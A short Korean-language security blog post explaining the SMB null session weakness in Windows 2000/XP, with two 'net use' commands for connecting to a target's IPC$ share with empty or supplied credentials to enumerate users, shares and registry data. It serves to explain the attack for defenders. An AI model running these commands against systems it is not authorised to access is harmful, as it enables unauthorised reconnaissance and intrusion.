SMB Null Session 공격
NetBIOS를 이용하여 공유폴더 IPC$ 등으로 ID와 PW를 공란(null) 으로 요청하면 세션이 성립되는 시스템 취약점을 이용한 공격
이 취약점을 이용하여 시스템의 유저명과 공유 정보를 열람할 수 있으며, 레지스트리 HKEY_LOCAL_MACHINE 의 일부에도 접근 가능
윈도우 2000/XP 에서 취약하다.
공격방법
net use \\[공격서버IP]\ipc$ "" /user:""
net use \\[공격서버IP]\ipc$ "[Password]" /user:"[USER ID]"
References
https://puriha.blog.me/220294518110
https://blog.naver.com/lolspeedup/220354611020
https://blog.naver.com/p_rain/220676947051
'SECURITY > 시스템 보안' 카테고리의 다른 글
[윈도우보안][링크] 윈도우 계정 보안식별자 정리(SID) (0) | 2019.09.25 |
---|---|
[시스템보안] 보안담당자를 위한 OS별 로그설정 노트(KISA 제공) (0) | 2019.08.20 |
[리눅스보안][링크] Bash 쉘쇼크 취약점 (0) | 2019.02.15 |
[윈도우보안] NetBIOS 관련 통신포트와 기능 (0) | 2019.02.13 |